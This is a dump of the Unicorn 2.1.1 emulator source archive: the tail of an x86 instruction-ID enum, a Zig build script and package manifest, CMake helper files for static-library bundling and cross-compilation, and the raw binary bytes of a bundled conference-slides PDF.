1256, X86_INS_VROUNDPS = 1257, X86_INS_VROUNDSD = 1258, X86_INS_VROUNDSS = 1259, X86_INS_VRSQRT14PD = 1260, X86_INS_VRSQRT14PS = 1261, X86_INS_VRSQRT14SD = 1262, X86_INS_VRSQRT14SS = 1263, X86_INS_VRSQRT28PD = 1264, X86_INS_VRSQRT28PS = 1265, X86_INS_VRSQRT28SD = 1266, X86_INS_VRSQRT28SS = 1267, X86_INS_VRSQRTPS = 1268, X86_INS_VRSQRTSS = 1269, X86_INS_VSCATTERDPD = 1270, X86_INS_VSCATTERDPS = 1271, X86_INS_VSCATTERPF0DPD = 1272, X86_INS_VSCATTERPF0DPS = 1273, X86_INS_VSCATTERPF0QPD = 1274, X86_INS_VSCATTERPF0QPS = 1275, X86_INS_VSCATTERPF1DPD = 1276, X86_INS_VSCATTERPF1DPS = 1277, X86_INS_VSCATTERPF1QPD = 1278, X86_INS_VSCATTERPF1QPS = 1279, X86_INS_VSCATTERQPD = 1280, X86_INS_VSCATTERQPS = 1281, X86_INS_VSHUFPD = 1282, X86_INS_VSHUFPS = 1283, X86_INS_VSQRTPD = 1284, X86_INS_VSQRTPS = 1285, X86_INS_VSQRTSD = 1286, X86_INS_VSQRTSS = 1287, 
    X86_INS_VSTMXCSR = 1288, X86_INS_VSUBPD = 1289, X86_INS_VSUBPS = 1290, X86_INS_VSUBSD = 1291,
    X86_INS_VSUBSS = 1292, X86_INS_VTESTPD = 1293, X86_INS_VTESTPS = 1294, X86_INS_VUNPCKHPD = 1295,
    X86_INS_VUNPCKHPS = 1296, X86_INS_VUNPCKLPD = 1297, X86_INS_VUNPCKLPS = 1298, X86_INS_VZEROALL = 1299,
    X86_INS_VZEROUPPER = 1300, X86_INS_WAIT = 1301, X86_INS_WBINVD = 1302, X86_INS_WRFSBASE = 1303,
    X86_INS_WRGSBASE = 1304, X86_INS_WRMSR = 1305, X86_INS_XABORT = 1306, X86_INS_XACQUIRE = 1307,
    X86_INS_XBEGIN = 1308, X86_INS_XCHG = 1309, X86_INS_XCRYPTCBC = 1310, X86_INS_XCRYPTCFB = 1311,
    X86_INS_XCRYPTCTR = 1312, X86_INS_XCRYPTECB = 1313, X86_INS_XCRYPTOFB = 1314, X86_INS_XEND = 1315,
    X86_INS_XGETBV = 1316, X86_INS_XLATB = 1317, X86_INS_XRELEASE = 1318, X86_INS_XRSTOR = 1319,
    X86_INS_XRSTOR64 = 1320, X86_INS_XRSTORS = 1321, X86_INS_XRSTORS64 = 1322, X86_INS_XSAVE = 1323,
    X86_INS_XSAVE64 = 1324, X86_INS_XSAVEC = 1325, X86_INS_XSAVEC64 = 1326, X86_INS_XSAVEOPT = 1327,
    X86_INS_XSAVEOPT64 = 1328, X86_INS_XSAVES = 1329, X86_INS_XSAVES64 = 1330, X86_INS_XSETBV = 1331,
    X86_INS_XSHA1 = 1332, X86_INS_XSHA256 = 1333, X86_INS_XSTORE = 1334, X86_INS_XTEST = 1335,
    X86_INS_FDISI8087_NOP = 1336, X86_INS_FENI8087_NOP = 1337, X86_INS_ENDING = 1338,
};

unicorn-2.1.1/build.zig

//! License: GNU GENERAL PUBLIC LICENSE Version 2

const std = @import("std");

const MIN_ZIG_VERSION: []const u8 = "0.13.0";
const MIN_ZIG_VERSION_ERR_MSG = "Please update your Zig toolchain to >= v" ++ MIN_ZIG_VERSION;

const SampleFileTypes = enum {
    c,
    cpp,
    zig,
};

const SampleDescription = struct {
    file_type: SampleFileTypes,
    root_file_path: []const u8,
};

/// Create a module for the Zig Bindings
///
/// This will also get exported as a library that other zig projects can use
/// as a dependency via the zig build system.
fn create_unicorn_sys(b: *std.Build, target: std.Build.ResolvedTarget, optimize: std.builtin.OptimizeMode) *std.Build.Module {
    const unicorn_sys = b.addModule("unicorn-sys", .{
        .target = target,
        .optimize = optimize,
        .root_source_file = b.path("bindings/zig/unicorn/unicorn.zig"),
    });

    // link libc
    unicorn_sys.link_libc = true;

    // we need the c header for the zig-bindings
    unicorn_sys.addIncludePath(b.path("include"));
    unicorn_sys.addLibraryPath(b.path("build"));

    // Linking to the Unicorn library
    if (target.result.abi == .msvc and target.result.os.tag == .windows) {
        unicorn_sys.linkSystemLibrary("unicorn.dll", .{});
    } else {
        unicorn_sys.linkSystemLibrary("unicorn", .{});
    }

    return unicorn_sys;
}

// Although this function looks imperative, note that its job is to
// declaratively construct a build graph that will be executed by an external
// runner.
pub fn build(b: *std.Build) void {
    if (comptime !checkVersion()) @compileError(MIN_ZIG_VERSION_ERR_MSG);

    // Standard target options allow the person running `zig build` to choose
    // what target to build for. Here we do not override the defaults, which
    // means any target is allowed, and the default is native. Other options
    // for restricting the supported target set are available.
    const target = b.standardTargetOptions(.{});

    // Standard optimization options allow the person running `zig build` to select
    // between Debug, ReleaseSafe, ReleaseFast, and ReleaseSmall. Here we do not
    // set a preferred release mode, allowing the user to decide how to optimize.
    const optimize = b.standardOptimizeOption(.{});

    // Give the user the option to perform the cmake build in parallel or not
    // (e.g. CI on macOS will fail if parallel is enabled)
    //
    // flag: -Dparallel=true/false
    const parallel_cmake = b.option(bool, "parallel", "Enable parallel cmake build") orelse true;

    // flag: -DSamples=True/False
    const samples = b.option(bool, "Samples", "Build all Samples [default: true]") orelse true;

    const sample_bins = [_]SampleDescription{
        .{ .file_type = .zig, .root_file_path = "bindings/zig/sample/sample_riscv_zig.zig" },
        .{ .file_type = .c, .root_file_path = "samples/sample_arm.c" },
        .{ .file_type = .c, .root_file_path = "samples/sample_arm64.c" },
        .{ .file_type = .c, .root_file_path = "samples/sample_ctl.c" },
        .{ .file_type = .c, .root_file_path = "samples/sample_batch_reg.c" },
        .{ .file_type = .c, .root_file_path = "samples/sample_m68k.c" },
        .{ .file_type = .c, .root_file_path = "samples/sample_riscv.c" },
        .{ .file_type = .c, .root_file_path = "samples/sample_sparc.c" },
        .{ .file_type = .c, .root_file_path = "samples/sample_s390x.c" },
        .{ .file_type = .c, .root_file_path = "samples/shellcode.c" },
        .{ .file_type = .c, .root_file_path = "samples/sample_tricore.c" },
        .{ .file_type = .c, .root_file_path = "samples/sample_x86.c" },
        .{ .file_type = .c, .root_file_path = "samples/sample_x86_32_gdt_and_seg_regs.c" },
    };

    // make a module for Zig Bindings
    const unicorn_sys = create_unicorn_sys(b, target, optimize);

    // Build Samples
    if (samples) {
        for (sample_bins) |sample| {
            const sample_bin = buildExe(b, .{
                .target = target,
                .optimize = optimize,
                .filetype = sample.file_type,
                .filepath = sample.root_file_path,
            });
            // import the unicorn sys module if this is a zig build
            if (sample.file_type == .zig) {
                sample_bin.root_module.addImport("unicorn", unicorn_sys);
            }
        }
    }

    // CMake Build
    const cmake = cmakeBuild(b, parallel_cmake);
    const cmake_step = b.step("cmake", "Run cmake build");
    cmake_step.dependOn(&cmake.step);
}

fn buildExe(b: *std.Build, info: BuildInfo) *std.Build.Step.Compile {
    const target = info.stdTarget();
    const execonfig: std.Build.ExecutableOptions = switch (info.filetype) {
        .c, .cpp => .{
            .name = info.filename(),
            .target = info.target,
            .optimize = info.optimize,
        },
        else => .{
            .name = info.filename(),
            .target = info.target,
            .optimize = info.optimize,
            .root_source_file = b.path(info.filepath),
        },
    };
    const exe = b.addExecutable(execonfig);

    if (info.filetype != .zig) {
        exe.addCSourceFile(.{
            .file = b.path(info.filepath),
            .flags = &.{
                "-Wall",
                "-Werror",
                "-fno-sanitize=all",
                "-Wshadow",
            },
        });
        // Ensure the C headers are available
        exe.addIncludePath(b.path("include"));
        // Ensure the C library is available
        exe.addLibraryPath(b.path("build"));
        // linking to OS-LibC or static-linking for:
        // Musl(Linux) [e.g: -Dtarget=native-linux-musl]
        // MinGW(Windows) [e.g: -Dtarget=native-windows-gnu (default)]
        if (info.filetype == .cpp and target.abi != .msvc)
            exe.linkLibCpp() // static-linking LLVM-libcxx (all targets) + libC
        else
            exe.linkLibC();
        // Now link the Unicorn library
        if (target.abi == .msvc and target.os.tag == .windows) {
            exe.linkSystemLibrary("unicorn.dll");
        } else exe.linkSystemLibrary("unicorn");
    }

    // Disable LTO when linking against the Unicorn DLL with MSVC
    if (target.abi == .msvc and target.os.tag == .windows) {
        exe.want_lto = false;
    }

    // This declares intent for the executable to be installed into the
    // standard location when the user invokes the "install" step (the default
    // step when running `zig build`).
    b.installArtifact(exe);

    // This *creates* a RunStep in the build graph, to be executed when another
    // step is evaluated that depends on it. The next line below will establish
    // such a dependency.
    const run_cmd = b.addRunArtifact(exe);

    // By making the run step depend on the install step, it will be run from the
    // installation directory rather than directly from within the cache directory.
    // This is not necessary, however, if the application depends on other installed
    // files, this ensures they will be present and in the expected location.
    run_cmd.step.dependOn(b.getInstallStep());

    // This allows the user to pass arguments to the application in the build
    // command itself, like this: `zig build run -- arg1 arg2 etc`
    if (b.args) |args| {
        run_cmd.addArgs(args);
    }

    // This creates a build step. It will be visible in the `zig build --help` menu,
    // and can be selected like this: `zig build run`
    // This will evaluate the `run` step rather than the default, which is "install".
    const run_step = b.step(info.filename(), b.fmt("Run the {s}.", .{info.filename()}));
    run_step.dependOn(&run_cmd.step);

    return exe;
}

const PARALLEL_CMAKE_COMMAND = [_][]const u8{
    "cmake",
    "--build",
    "build",
    "--config",
    "release",
    "--parallel",
};

const SINGLE_CMAKE_COMMAND = [_][]const u8{
    "cmake",
    "--build",
    "build",
    "--config",
    "release",
};

fn cmakeBuild(b: *std.Build, parallel_cmake: bool) *std.Build.Step.Run {
    const preconf = b.addSystemCommand(&.{
        "cmake",
        "-B",
        "build",
        "-DZIG_BUILD=ON",
        "-DUNICORN_BUILD_TESTS=OFF",
        "-DUNICORN_INSTALL=OFF",
        "-DCMAKE_BUILD_TYPE=Release",
    });

    // build in parallel if requested
    const cmakebuild = b.addSystemCommand(blk: {
        if (parallel_cmake) {
            break :blk &PARALLEL_CMAKE_COMMAND;
        } else {
            break :blk &SINGLE_CMAKE_COMMAND;
        }
    });

    cmakebuild.step.dependOn(&preconf.step);

    return cmakebuild;
}

// ensures the currently in-use zig version is at least the minimum required
fn checkVersion() bool {
    const builtin = @import("builtin");
    if (!@hasDecl(builtin, "zig_version")) {
        return false;
    }

    const needed_version = std.SemanticVersion.parse(MIN_ZIG_VERSION) catch unreachable;
    const version = builtin.zig_version;
    const order = version.order(needed_version);
    return order != .lt;
}

const BuildInfo = struct {
    filepath: []const u8,
    filetype: SampleFileTypes,
    target: std.Build.ResolvedTarget,
    optimize: std.builtin.OptimizeMode,

    fn filename(self: BuildInfo) []const u8 {
        var split = std.mem.splitSequence(u8, std.fs.path.basename(self.filepath), ".");
        return split.first();
    }

    fn stdTarget(self: *const BuildInfo) std.Target {
        return self.target.result;
    }
};
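The `unicorn-sys` module registered above via `b.addModule("unicorn-sys", ...)` is what downstream Zig projects import through the package manager. A minimal sketch of a hypothetical consumer `build.zig` follows (not part of this repository); the dependency name "unicorn", the executable name "demo", and the source path "src/main.zig" are assumptions, not anything the archive defines.

// Hypothetical consumer build.zig (a sketch, not part of unicorn-2.1.1).
// Assumes the consumer's build.zig.zon declares a dependency named "unicorn"
// that points at this repository.
const std = @import("std");

pub fn build(b: *std.Build) void {
    const target = b.standardTargetOptions(.{});
    const optimize = b.standardOptimizeOption(.{});

    const exe = b.addExecutable(.{
        .name = "demo", // hypothetical executable name
        .root_source_file = b.path("src/main.zig"), // hypothetical source path
        .target = target,
        .optimize = optimize,
    });

    // Resolve the dependency, then import the module that
    // create_unicorn_sys() above registers as "unicorn-sys".
    const unicorn_dep = b.dependency("unicorn", .{
        .target = target,
        .optimize = optimize,
    });
    exe.root_module.addImport("unicorn", unicorn_dep.module("unicorn-sys"));

    b.installArtifact(exe);
}

Because create_unicorn_sys() already wires in libc, the include path, and the system library, the consumer only needs the single addImport call.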
unicorn-2.1.1/build.zig.zon

.{
    .name = "unicorn",
    .version = "2.1.1",
    .paths = .{""},
}
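The manifest above only names and versions the package. A hypothetical consumer would reference it under `.dependencies` in its own `build.zig.zon`, as sketched below; the `url` and `hash` values are placeholders (running `zig fetch --save <url>` computes the real ones), and the package name "demo" is an assumption.

// Hypothetical consumer build.zig.zon (sketch; url and hash are placeholders).
.{
    .name = "demo",
    .version = "0.0.1",
    .dependencies = .{
        .unicorn = .{
            .url = "https://example.com/unicorn-2.1.1.tar.gz", // placeholder URL
            .hash = "1220...", // placeholder; zig fetch fills in the real multihash
        },
    },
    .paths = .{""},
}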
unicorn-2.1.1/cmake/bundle_static.cmake

# https://cristianadam.eu/20190501/bundling-together-static-libraries-with-cmake/
function(bundle_static_library tgt_name bundled_tgt_name library_name)
  list(APPEND static_libs ${tgt_name})
  set(dep_libs "")

  function(_recursively_collect_dependencies input_target)
    set(_input_link_libraries LINK_LIBRARIES)
    get_target_property(_input_type ${input_target} TYPE)
    if (${_input_type} STREQUAL "INTERFACE_LIBRARY")
      set(_input_link_libraries INTERFACE_LINK_LIBRARIES)
    endif()
    get_target_property(public_dependencies ${input_target} ${_input_link_libraries})
    foreach(dependency IN LISTS public_dependencies)
      if(TARGET ${dependency})
        get_target_property(alias ${dependency} ALIASED_TARGET)
        if (TARGET ${alias})
          set(dependency ${alias})
        endif()
        get_target_property(_type ${dependency} TYPE)
        if (${_type} STREQUAL "STATIC_LIBRARY")
          list(APPEND static_libs ${dependency})
        endif()
        get_property(library_already_added GLOBAL PROPERTY _${tgt_name}_static_bundle_${dependency})
        if (NOT library_already_added)
          set_property(GLOBAL PROPERTY _${tgt_name}_static_bundle_${dependency} ON)
          _recursively_collect_dependencies(${dependency})
        endif()
      elseif(dependency)
        list(APPEND dep_libs ${dependency})
      endif()
    endforeach()
    set(static_libs ${static_libs} PARENT_SCOPE)
    set(dep_libs ${dep_libs} PARENT_SCOPE)
  endfunction()

  _recursively_collect_dependencies(${tgt_name})

  list(REMOVE_DUPLICATES static_libs)
  list(REMOVE_DUPLICATES dep_libs)

  set(bundled_tgt_full_name
    ${CMAKE_BINARY_DIR}/${CMAKE_STATIC_LIBRARY_PREFIX}${library_name}${CMAKE_STATIC_LIBRARY_SUFFIX})

  if (APPLE)
    find_program(lib_tool libtool REQUIRED)
    foreach(tgt IN LISTS static_libs)
      list(APPEND static_libs_full_names $<TARGET_FILE:${tgt}>)
    endforeach()
    add_custom_command(
      COMMAND ${lib_tool} -static -o ${bundled_tgt_full_name} ${static_libs_full_names}
      OUTPUT ${bundled_tgt_full_name}
      COMMENT "Bundling ${bundled_tgt_name}"
      VERBATIM)
  elseif(UNIX OR MINGW)
    file(WRITE ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar.in
      "CREATE ${bundled_tgt_full_name}\n" )
    foreach(tgt IN LISTS static_libs)
      file(APPEND ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar.in
        "ADDLIB $<TARGET_FILE:${tgt}>\n")
    endforeach()
    file(APPEND ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar.in "SAVE\n")
    file(APPEND ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar.in "END\n")
    file(GENERATE
      OUTPUT ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar
      INPUT ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar.in)

    set(ar_tool ${CMAKE_AR})
    if (CMAKE_INTERPROCEDURAL_OPTIMIZATION)
      set(ar_tool ${CMAKE_CXX_COMPILER_AR})
    endif()

    add_custom_command(
      COMMAND ${ar_tool} -M < ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar
      OUTPUT ${bundled_tgt_full_name}
      COMMENT "Bundling ${bundled_tgt_name}"
      VERBATIM)
  elseif(WIN32)
    # https://stackoverflow.com/a/38096930/1806760
    get_filename_component(vs_bin_path "${CMAKE_LINKER}" DIRECTORY)
    find_program(lib_tool lib HINTS "${vs_bin_path}" REQUIRED)
    foreach(tgt IN LISTS static_libs)
      list(APPEND static_libs_full_names $<TARGET_FILE:${tgt}>)
    endforeach()
    add_custom_command(
      COMMAND ${lib_tool} /NOLOGO /OUT:${bundled_tgt_full_name} ${static_libs_full_names}
      OUTPUT ${bundled_tgt_full_name}
      COMMENT "Bundling ${bundled_tgt_name}"
      VERBATIM)
  else()
    message(FATAL_ERROR "Unknown bundle scenario!")
  endif()

  add_custom_target(bundling_target ALL DEPENDS ${bundled_tgt_full_name})
  add_dependencies(bundling_target ${tgt_name})

  add_library(${bundled_tgt_name} STATIC IMPORTED)
  set_target_properties(${bundled_tgt_name}
    PROPERTIES
      IMPORTED_LOCATION ${bundled_tgt_full_name}
      INTERFACE_INCLUDE_DIRECTORIES $<TARGET_PROPERTY:${tgt_name},INTERFACE_INCLUDE_DIRECTORIES>
      INTERFACE_LINK_LIBRARIES "${dep_libs}")
      #IMPORTED_LINK_INTERFACE_LIBRARIES "${dep_libs}") # Deprecated

  add_dependencies(${bundled_tgt_name} bundling_target)
endfunction()

unicorn-2.1.1/cmake/mingw-w64.cmake

# cross compile
SET(CMAKE_SYSTEM_NAME Windows)

# set the compiler
SET(CMAKE_C_COMPILER x86_64-w64-mingw32-gcc)
SET(CMAKE_CXX_COMPILER x86_64-w64-mingw32-g++)
SET(CMAKE_RC_COMPILER x86_64-w64-mingw32-windres)

# set the compiler search path
SET(CMAKE_FIND_ROOT_PATH /usr/x86_64-w64-mingw32)

# adjust the default behaviour of the FIND_XXX() commands:
# search headers and libraries in the target environment, search
# programs in the host environment
set(CMAKE_FIND_ROOT_PATH_MODE_PROGRAM NEVER)
set(CMAKE_FIND_ROOT_PATH_MODE_LIBRARY ONLY)
set(CMAKE_FIND_ROOT_PATH_MODE_INCLUDE ONLY)

unicorn-2.1.1/cmake/zig.cmake

set(CMAKE_CROSSCOMPILING TRUE)

# set the compiler
if(WIN32)
    SET(ZIG_CC ${CMAKE_SOURCE_DIR}/bindings/zig/tools/zigcc.cmd)
else()
    SET(ZIG_CC ${CMAKE_SOURCE_DIR}/bindings/zig/tools/zigcc.sh)
endif()

SET(CMAKE_C_COMPILER_ID ${ZIG_CC})
SET(CMAKE_C_COMPILER ${ZIG_CC})

unicorn-2.1.1/docs/BHUSA2015-unicorn.pdf

[binary PDF data: the Black Hat USA 2015 Unicorn presentation; content omitted]
/FormType 1 /Matrix [1 0 0 1 0 0] /Resources 18 0 R /Length 15 /Filter /FlateDecode >> stream xP(� endstream endobj 23 0 obj << /Type /XObject /Subtype /Form /BBox [0 0 100 100] /FormType 1 /Matrix [1 0 0 1 0 0] /Resources 24 0 R /Length 15 /Filter /FlateDecode >> stream xP(� endstream endobj 26 0 obj << /Type /XObject /Subtype /Form /BBox [0 0 100 100] /FormType 1 /Matrix [1 0 0 1 0 0] /Resources 27 0 R /Length 15 /Filter /FlateDecode >> stream xP(� endstream endobj 29 0 obj << /Type /XObject /Subtype /Form /BBox [0 0 100 100] /FormType 1 /Matrix [1 0 0 1 0 0] /Resources 30 0 R /Length 15 /Filter /FlateDecode >> stream xP(� endstream endobj 32 0 obj << /Type /XObject /Subtype /Form /BBox [0 0 100 100] /FormType 1 /Matrix [1 0 0 1 0 0] /Resources 33 0 R /Length 15 /Filter /FlateDecode >> stream xP(� endstream endobj 78 0 obj << /Length 655 /Filter /FlateDecode >> stream xUKo@WіfZ8D$`qTcz6MHgvgp].pC e$sJ il;@? Uk|۫q-ΑGQ@(a`5ǓPr)S0ř e0oѴϖQ'"*cT8Ulj.e@B=_dyyJ颹O [9[X,7ɧ*u0g{�y˸ü1hZP*,e(b66|FY洣gƣ1U":*I8k~(Q I"߲r.DX -0~tIh<"7YYՋ`hH>Dφ=՞&b^k 6|j8rC͏^uLr|tL 1U-p0ڧ55.RDž%>]꼮9=< i-NQ6wy~^zgA3o ͏&d>B( &Ц<S}ߩPX/:-}ǡ"V6o*9mP>JƓ"GU3/zS1uUdSړiشFi$msOBO8jiÖPQIP܎?J endstream endobj 74 0 obj << /Type /XObject /Subtype /Image /Width 411 /Height 422 /BitsPerComponent 8 /ColorSpace /DeviceRGB /SMask 86 0 R /Length 19833 /Filter /FlateDecode >> stream x}[n:c>|<L!/Anqb["%JrdwQEU8Nn_(r.VEذE}4Z(ҀMH_(~4-?LU8V9|uShn`�h(D}B)UV8ikIewC  C{-fgI1: H7h 揑e4Z�-US KhV^+z*%*W ZQXҺR?a=F4\;ZL <1҈U!v5,ڊRbr-,\m}Dž_ܒ 6Њ@R}^dyNv~.=^6p)Rj6iKjU(O[X0q)2~+!j۪ϷW ̮aVgo_`j+`8{޹)%6}< /R30M/~:(L\_R}l L.P"m'D"S0; 6h`5BSts*v,(=Hkp3) LCZzhNAkGKR&ب/^�6{c9Պh7ظ�| <>$[<3\Yo^06;A脯>;lt볇 G!lǞ0Ljt{=k_h2hiǂδ`/sc@ΐ%XYya]lasU"tHVX-^.&U62V= kAE jp: #hmY^ cxWr /|ʖdvrh&ծ+pDw_Q 5GvI;iLۃ)WV- ٕдR+Q b1'wvo<95R Uxw+mc3nIMTwsm+U''Xޣo`^pֶJ:QjRUX>A 3ң%S79;0oMKgiu0M0uI-z|,xpГdo9CkqCAc%E2,43+7FP T(_tALlʀ&O gvLѺN6vA mM) ҍ{Uogv~%̒\{n4m7G)+SJ%#O;.&h]}SӐ@4fuZfO UP?yhYZ;IAځ=fO{Mߘ|+efxv-Ybzi U!@ lBW<^6z7'V <M띩+sq$/אBPD АA(fyRG~^kW!C̠ &=4|PgtżsNڿMP@^ IWN% Q52 .JBjisA3;kl!f J{)tb-H_H+~h l+qJI\ BrppiD(6L3Oq숄x%<Nc(H+2$.=p)y~?AB-cOjGK ,tX94 Vju�Y<!֔3T*vQw�aG'9(Eyۄ2O/Wq`b4n I9[!KNMm1AXF ;lbrpdByjDa:3kV*2~bem2c59,l{Tjx Ħ +.}6WA3`ᙊOPER[烒ϋҘhP,dr]G&큆(ݖB9wMo'MQ =sa2;t<FIa4?ݗ)-ޭ:W@4*fಓZAZvBlw= 4ʘ``vÍc@uEe0t5VZn%nbiB_a]�fŞ2crtĶ)kFܚUMSU!X+NDv e8AD?meGs{k(. 
޽ x$X&IfKp <RRSdx؀Dt3Gʠ `rHj_ס1WJt;ڪ!4fS)a{<Ǐ:i؅;&~ftGN~,V4tijMgIcFYG%|Fw@F,TK ZŒ\7D_L-ڃ{>N:-_7$mo¿s,"=,'I3cIEe*"WJ"/_!mj xd7?9G*>MUs~Y ƤtFks~Y�zHk;e"ᤵ~E+BηWFz.E3tyS8F_y9 <^c~]' !, ='1ƝY6KAASa[>pD\`$ovnZ=YONKsRʲ m26q6e׻ SF9L;RΠM%-AL{ϋ:(KϳmAذe"4OepRrX ԣ~ty^2Kix thNt)p`\ -er'ʤQxu5 5,C9Op$I78?sOl5t'DVSut`@KN�f ew)?{2k/xXK{2X}( L F{ѡ *lC\7 Q ;H7]")9&V\M E7>8fjs};%oVd|91 hMck P)%2}@س4 6-#|Z;i'>աSulψhdFiSC�>- 2I>v)ڕ 9wA^4kȐ44�`IT@#\}[] Rv/.j"1 ÿ[q>+9qZ3ߪVQʗ7vf`J[:jj_[L㤍3èZ'?vA#uȌI-Af6[Sj`VְURx춍{9*,?(ѯ \EŒi2?Eq U`{jl J AO:4 JuNܣLY='VH~{5CgS7.P*1Iݸ\bkk~i4mzm2HLUhA{68{\ŎDF3?=긗@[vO|fk=ޯyz#*"`ZZ9cHn:H) </] ̌1׺R 8DoGɖJ8C ,,e+Ot>8#iJZ/E<Rz iCL'/NMo@>YzbYa;ujY0OAX^WH%\r26x2H &cLg4S X<6�KD38zXxbmt> }B/@�v~-Y *$c[bO[I!Z|DX]| qq AK2iV9|{8S)iWvd_j \CFY`^ٿȟ򉁁wt:u m5̙zF%wۖfA"14cXOL~L=`S4^LO,'<8 pȂ5ZI=?iJ(}UIDGW u�MiO[znhc5%WMj) ,C5lweS-HE2D&S=Fk1ˁҩ׃MK]J0K(<D6T,* `EW%i֬ �S6H*iʁ5Ii=kwCaOJ6V Ҟq=`;vI׷l[Z3iV6jـGRG\ĀD]zV>x 0Y{dG˿^ftk54_<WWgW*3z,"W>ѡTu�&fD'IJا٬CKuJ#`iE}q h60S4c4S?UpL'Y8GnJa`d@$*_7MG,^<j ]!~VfSf*%7xfzwK5+.;\ݪ<IrB9e4[*�pޛ 9|[Y/񗳇KAhN^Ԓf31l*H27an[6{b{5}<X[xpf G@`(DpcǢg|WSA0 Vh Cf@ɖ�%x:3C]G@7]E�ԝXX"3(xf8 @TpEKM{\ U6vaZCJo@ك25+?ءfJDZAt|MC]t&`Jf(dՍ`.beT :X^'PfkFҫuRzAeUgD}C @Kff;/sXR1&oh 6W8`3Gs(˦0?~˫F!Q @楋Rtخ?YBW Hh}:b}P"֥"@GCꌎZ]Qdh1UZ5h']5.2We)!.AIsvTF/[Q_pLsJ�&v=2$<Q`mCK'-14ܖc;}lx"p#GW_S>,oE-\F|RG~=ROE0wۊ!M{!T[L<ex|[%Eɳ95 "Le+%v(/V{m:EOC1CMN[f"?u!YF].6 r8)icLLy67m̟),9Ye5*镜[ ThTaJLR9M .{j.n͵cy!Փrj T ՚AD䒭0C.+D62s`Ih&$4̍nW j/`YъV�-cY$Uq�ڜ"MQz U9}돞<Z.bڙLZg BD]n1S'E(n/m`_:Jhi[XEYK:3hkl @!r.?LMˏ? œb,LEDwyM*l*-o� D5 �ͱM!Ic\{opMb$F%6/ݙ+ E3t]}骆FAp!TgХVX4Q)顢ʿ~"H;0zx:lƴ6(& ,+]{΀nCW{)M\Zʆ5=+,eT #CG3ywBE7GZF/oWpϊ6xXJ\5 ͎q#m<46ֿW‹qCEA >!>I̜W]T^Q7YLҐ]\5(ܷD&hG@ SmqSg7zЄl0_쮝>_ h_"uksxM͐ � P�mORfP\'(ߴyh&;WCmG=~GD. eREhyLAJI2Q~Y§: S̪pI2ڸb (?- eG LKk1\;?tvi2YUMltl D0>% @PYV{6@S]`:JCj;n]4zo"xaW'4baK)HeI~?-xf}rx-3bQFf#ʐ:, ,vyĨ6>=G4xDv43<Qk[ك&6QțE~iQh?U=i-(_ wl-H%ur CgY.],^O:HejY;R;FQp}.}Zsjbw`3мY?l98iE;p;T`Ra|LHQFga; 7.z>NGknL)kU#晅H(M!| 075& N ơ ]# ϵ>DQërk�i"J> Ix ^ Ⱦ$4>R~=Xn iX=(5GGiTGOA(G;A ʬF2SMl8c^5w5L o4 6hJy=#7pj\_XW30Uxo02tŋF!gV#›Pת$K-)-1OsBIۆ]vh#He|R<ؙV_t̂0s ,;Q62>íf^E̕ԸV$ `Ncw9>i(2"|fya1I,gW԰0:n BFoG߷Itϴx ~](\ߏ!1jR*EHjgsVbr rSpL%Z2q$ʦF/9 0=|O$ۚ_d0-;ora*払"c{5[kU X60}Ѹp7ci)I8ܳ`gO}Eܳg^,`o}SEIۋ0{- T‘f2i{{[5MiҖQg?_3iS иi@"ޏq.D၊Op7nbq= QM <4 ǝ)ι\L1Ӹ6 HEe&v95uilG_䊞em,왝cr޼[c<u,gt<u1�-i},-F˵6v:Gw?< {BpZ~ : *+Rk #Eٳ0P8/d @A誵Ư og0 T0iE&[R?`oxPkjkӸ^:EY07=4$InySPKg{tnvg6dP6k22|ڦsY/G\=3Q9�)+YlEIC|#l;|S+=F?A7IDD<:Ò[?[@S{qfʹtϐb,^J9 ꄺ D׍@HX#x<҉1$7$&{U=T=͖PH#叮ŷcJE|_a,km ֽE>3BSYcgcHF>Tߘf<14;H_jt wʎA+MvEj+HHT'ҷ<imFǃSfxk?a(!EgA/ уZk\{a}ڋpwZq͆  `=Vqoi')5"pZ~2q|eZG/:W{Z۔-5btoW]ȩ,J,0lCncv.&QӒϿ ^G D%-'Q^tsR#9aĀ{`h y,?( =vɞ[O.*AU$�tV0+n%'h `3"�Hc%޸k9JɎ}sxcYx\/.9�m?x4ۘlx iz.*<ɳ"ŭr2aE"͐$S4Тeb<_*IW,1hI=r�-1r5ji¾If;!'*}Ij'-_28laNm>&ծȶÏZ9䱾̋FS%}-ߠ+Ϥǣrz^<4r!e)eN^&IShostgu)rhI Fě#LwSZ^ьHfa``UC a7 ,#݁?ɴaƛ+8} L=1C4p҆0;JHZ!Mn}9H\趇xk!\`MzD|zA'XuoW}k0`%ޭISC|+צ hj%TI|uOA&ȉX]}x9XTx^v9j^ml@4P޻9=U68H;5k5\ ]n:Կ"PmN>ueRM()9xncIC�ЬMrڙM>e K+}>v!guA?� Ȩةl'PVC) ohp`2Ыgo1i ֵ-IvBbWcFEɃdLt`L dG n-<IG7e3*q7r/gpYP0a-~41 _*4)ǛTj5Z5)|2)N,<`` Lovd0jd MoXq E~6>뿼ydvV�q?垛C/q!/*Dp㶳6Ә/[Hmpqu# |LخSL˽ϓi*[mEBf.q�~ĞN2!.qݓnF,gJ?gо1[ACh<:8>ETQ:zzhɛ>rhLAQ.E Ӝœph#:1F.kc_UJppntfquM%<+>!(Rg: dV(B{m(bϓ[|@JTx-bF7/t"e . i9^ w-,&E ȩ j'Ns.diajDgG9|ښE Ӭ=e9@# ֚`{o�:'݊x :u B^`$վsUN-rBN}V>ǴPĒVauoP=1 zO  ! ׏~sk5A_:�;M1o:eұVGxVJZ@}[ zh]WYS_ENZZl,#oE<ꃆ1LC.krBFKgpH`>INaمiq.WMݦ!*1._g !ˑ⚾ buI!ٴ+*[E0 .as05fdmE \tCJKF ,n!7e`\=T,?[&QD^pݩ hŌS|B_ TkNc� ub<t^PaƛQEP UO ( 287u[gmV<]t|(Ig*7˓?s=T, 3SPjB*IN((:苬jeAPSubZПM VCv ^}]śHz$(A!ιHR(ȎI ѷ1R0VАꌁP/N_=r8@ {t6h}bmK3ce*_ [j-BQqZ^$b=s*S,ș*Aaeb74n9C'<Q �T]& 0+. 
